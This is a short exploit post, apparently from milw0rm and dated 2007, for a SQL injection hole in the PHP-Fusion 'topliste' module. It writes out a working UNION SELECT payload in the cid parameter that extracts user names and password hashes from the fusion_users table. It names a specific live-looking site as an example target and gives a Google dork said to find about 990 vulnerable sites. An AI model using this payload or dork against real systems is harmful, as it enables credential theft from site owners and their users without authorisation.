--------------------------------
PHP-FUSION topliste Module (cid) Remote SQL Injection Vuln
--------------------------------
Bulan: xoron - unique
xoron.biz
--------------------------------
Exploit:
index.php?cid=-1/**/UNION/**/SELECT/**/0,1,2,3,user_name,user_password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/**/FROM/**/fusion_users/*
--------------------------------
Exapmle: http://www.321spil.dk/infusions/topliste/
--------------------------------
Google Dork:
infusions/topliste/ 990 sites:)
--------------------------------
Ekin0x / --> evilc0der.org <--
--------------------------------
# milw0rm.com [2007-04-02]